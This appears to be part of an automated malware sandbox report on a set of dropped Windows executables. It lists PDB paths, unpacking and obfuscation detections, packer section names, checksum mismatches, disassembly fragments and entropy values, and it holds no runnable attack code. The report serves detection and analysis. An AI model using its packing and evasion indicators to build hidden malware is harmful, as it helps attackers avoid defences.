Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: m4C:\Windows\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Immovables.pdbH source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\Immovables.pdbyL source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: i1crvbOZAP.exe, i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF6495B3000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Immovables.pdbB source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb\ source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Immovables.pdbvables.pdbpdbles.pdbmmovables.pdb@0 source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\dijireluw jecifokig b.pdb source: i1crvbOZAP.exe, 00000000.00000003.1782449752.000002962610F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1780561393.0000029625ED4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029626005000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: m8C:\Windows\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\exe\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdbcu source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: .pdb.dbg source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: symbols\exe\Immovables.pdb source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Immovables.pdbvables.pdbpdbles.pdbmmovables.pdb@` source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: )).pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdbb5[ source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdbizS source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: m.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.00000000064C6000.00000004.00000800.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.0000000006651000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Unpacked PE file: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Unpacked PE file: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Unpacked PE file: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Unpacked PE file: 16.2.tiToqF4gUiKaoPfx2yS40yxZ.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iomijoue:EW;cpzudpwp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iomijoue:EW;cpzudpwp:EW;.taggant:EW;
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Unpacked PE file: 18.2.DcuyIDqrnrOUlJGUzTDFRaZm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Unpacked PE file: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Unpacked PE file: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: Start[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: gi9jnH1JSXQhDNxvPqB(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: gi9jnH1JSXQhDNxvPqB(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 6JHxagCVExT6_J_NgFfNr8iE.exe.0.dr

Static PE information: 0xFDE98884 [Sun Dec 28 20:48:04 2104 UTC]

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_00416240

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: Start[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x50fcb
Source: 7725eaa6592c80f8124e769b4e8a07f7[1].exe.0.dr	Static PE information: real checksum: 0x42de96 should be: 0x43812f
Source: csscx6pq5pjO0BwzvKMjhfKE.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x77e08e
Source: KUc3lCE6xAEEreIlM0ct4583.exe.0.dr	Static PE information: real checksum: 0x42de96 should be: 0x430d16
Source: Y8KGRj_sUjw5KjZpIoRDoSwV.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1db45d
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x46caf
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x50fcb
Source: setup[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x77e08e
Source: june[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1db45d
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: real checksum: 0x1edabe should be: 0x1e60fb
Source: RMz4w55AcOQKH9K459dvrUGA.exe.0.dr	Static PE information: real checksum: 0x42de96 should be: 0x43812f
Source: cad54ba5b01423b1af8ec10ab5719d97[1].exe.0.dr	Static PE information: real checksum: 0x42de96 should be: 0x430d16
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x6742d
Source: amadka[1].exe.0.dr	Static PE information: real checksum: 0x1edabe should be: 0x1e60fb

Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name: .themida
Source: i1crvbOZAP.exe	Static PE information: section name: .boot
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: .idata
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: iomijoue
Source: amadka[1].exe.0.dr	Static PE information: section name: cpzudpwp
Source: amadka[1].exe.0.dr	Static PE information: section name: .taggant
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name:
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: .idata
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name:
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: iomijoue
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: cpzudpwp
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: .taggant
Source: 123p[1].exe.0.dr	Static PE information: section name: .00cfg
Source: 123p[1].exe.0.dr	Static PE information: section name: .text0
Source: 123p[1].exe.0.dr	Static PE information: section name: .text1
Source: 123p[1].exe.0.dr	Static PE information: section name: .text2
Source: Arab[1].exe.0.dr	Static PE information: section name: .vmp
Source: Arab[1].exe.0.dr	Static PE information: section name: .vmp
Source: Arab[1].exe.0.dr	Static PE information: section name: .vmp
Source: Retailer[1].exe.0.dr	Static PE information: section name: .vmp
Source: Retailer[1].exe.0.dr	Static PE information: section name: .vmp
Source: Retailer[1].exe.0.dr	Static PE information: section name: .vmp
Source: CQTbcHuZCBIaghzHIvMnZgpt.exe.0.dr	Static PE information: section name: .00cfg
Source: CQTbcHuZCBIaghzHIvMnZgpt.exe.0.dr	Static PE information: section name: .text0
Source: CQTbcHuZCBIaghzHIvMnZgpt.exe.0.dr	Static PE information: section name: .text1
Source: CQTbcHuZCBIaghzHIvMnZgpt.exe.0.dr	Static PE information: section name: .text2
Source: uRWnWA7bjEhugCQgmREIdGsh.exe.0.dr	Static PE information: section name: .vmp
Source: uRWnWA7bjEhugCQgmREIdGsh.exe.0.dr	Static PE information: section name: .vmp
Source: uRWnWA7bjEhugCQgmREIdGsh.exe.0.dr	Static PE information: section name: .vmp
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe.0.dr	Static PE information: section name: .vmp
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe.0.dr	Static PE information: section name: .vmp
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe.0.dr	Static PE information: section name: .vmp
Source: setup[1].exe.0.dr	Static PE information: section name: .sxdata
Source: csscx6pq5pjO0BwzvKMjhfKE.exe.0.dr	Static PE information: section name: .sxdata
Source: Space[1].exe.0.dr	Static PE information: section name: .vmp
Source: Space[1].exe.0.dr	Static PE information: section name: .vmp
Source: Space[1].exe.0.dr	Static PE information: section name: .vmp
Source: xDVBd5GtHhrlSm0slOnr7_gW.exe.0.dr	Static PE information: section name: .vmp
Source: xDVBd5GtHhrlSm0slOnr7_gW.exe.0.dr	Static PE information: section name: .vmp
Source: xDVBd5GtHhrlSm0slOnr7_gW.exe.0.dr	Static PE information: section name: .vmp

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6492742D0 push cs; retf	0_2_00007FF6492742DF
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649275155 push cs; retf	0_2_00007FF649275177
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649274589 push A4E1E612h; iretd	0_2_00007FF649274576
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64926FDE1 push cs; retf	0_2_00007FF64926FDF7
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649272232 push cs; retf	0_2_00007FF649272233
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649272222 push cs; retf	0_2_00007FF649272223
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64927006C push cs; retf	0_2_00007FF649270087
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64926E4A9 push cs; retf	0_2_00007FF64926E4BB
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64927208D push cs; retf	0_2_00007FF649272123
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649274528 push A4E1E612h; iretd	0_2_00007FF649274576
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649274906 push cs; retf	0_2_00007FF649274907
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6492747D2 push cs; retf	0_2_00007FF6492747D3
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B3CE0 push esp; ret	0_2_00007FF6495B3CE2
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B32C3 push esi; ret	0_2_00007FF6495B333B
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B31B5 push edx; iretd	0_2_00007FF6495B31DF
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B335F push esi; ret	0_2_00007FF6495B333B
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B4602 push esi; retf	0_2_00007FF6495B4604
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B4409 pushfd ; iretd	0_2_00007FF6495B440A
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6495B31C2 push edx; iretd	0_2_00007FF6495B31DF
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFF3 push esi; ret	0_2_00007FF64935CFF4
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0048233C push ecx; iretd	5_2_0048237C
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0042A4AE pushfd ; retf	5_2_0042A511
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_004746D3 push edx; iretd	5_2_004746E0
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0044CDB1 push es; iretd	5_2_0044CE61
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00402F4C push ecx; retf	5_2_00402FD6
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00325025 push 00181732h; iretd	5_2_0032505A
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_004EB6ED push eax; retf	5_2_004EB71D
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0020FA97 push ecx; ret	5_2_0020FAAA
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Code function: 6_2_00CB4BC1 push ecx; ret	6_2_00CB4BC4
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Code function: 7_2_026143BD push edx; retf	7_2_026143C3
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B4573C push es; iretd	9_2_01B45742

Source: i1crvbOZAP.exe	Static PE information: section name: entropy: 7.999596731666824
Source: amadka[1].exe.0.dr	Static PE information: section name: entropy: 7.976552800429332
Source: amadka[1].exe.0.dr	Static PE information: section name: iomijoue entropy: 7.954396744469652
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: entropy: 7.976552800429332
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: iomijoue entropy: 7.954396744469652
Source: Start[1].exe.0.dr	Static PE information: section name: .text entropy: 7.78072132367536
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe.0.dr	Static PE information: section name: .text entropy: 7.78072132367536
Source: cTThtD77H613MBNsXAevJo07.exe.0.dr	Static PE information: section name: .text entropy: 7.836942684947091
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr	Static PE information: section name: .text entropy: 7.7318503324577295

Source: Start[1].exe.0.dr, Angelo.cs	High entropy of concatenated method names: 'ReturnSpecialList', 'uuNk6g1xbmawQqWEJnm', 'XGjw541qBpxecNpYOhg', 'oOGJq51E5uCPx21pZ4o', 'DP7BUn158x82jjPOdXV', 'DYcDtY1dEEfIQbEmH9h'
